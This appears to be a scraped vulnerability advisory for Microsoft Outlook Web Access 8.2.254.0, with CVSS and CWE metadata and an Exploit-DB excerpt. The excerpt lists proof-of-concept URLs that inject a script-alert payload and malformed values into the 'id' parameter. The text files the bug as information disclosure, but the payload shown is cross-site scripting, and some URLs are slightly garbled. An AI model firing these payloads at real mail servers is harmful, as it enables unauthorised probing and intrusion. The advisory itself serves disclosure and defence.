Information disclosure vulnerability in Microsoft Outlook Web Access (OWA) version 8.2.254.0

vendor:

Microsoft Outlook Web Access

by:

Praveen Darshanam

5.5

CVSS

MEDIUM

Information Disclosure

200

CWE

Product Name: Microsoft Outlook Web Access

Affected Version From: 8.2.254.0

Affected Version To: 8.2.254.0

Patch Exists: NO

Related CWE:

CPE: a:microsoft:outlook_web_access:8.2.254.0

Metasploit:

Other Scripts:

Platforms Tested: Windows Server 2003, Internet Explorer 7

Information disclosure vulnerability in Microsoft Outlook Web Access (OWA) version 8.2.254.0

The vulnerability exists in the id parameter of Microsoft Outlook Web Access (OWA) version 8.2.254.0. Attackers can exploit this vulnerability to disclose sensitive information.

Mitigation:

Apply the latest security updates and patches provided by Microsoft.

Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

"Microsoft Outlook Web Access (OWA) version 8.2.254.0"

OS: Windows Server 2003

Internet Explorer 7

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

There is an information disclosure vulnerability in "Microsoft Outlook Web
Access (OWA) version 8.2.254.0".

The issue is with the id parameter.

Following are different exploitation techniques:

https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script<https://example.com/owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script>
>

https://example.com/owa/?ae=Folder&t=IPF.Note&id=

https://example.com/owa/?ae=Folder&t=IPF.Note&id=A



Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA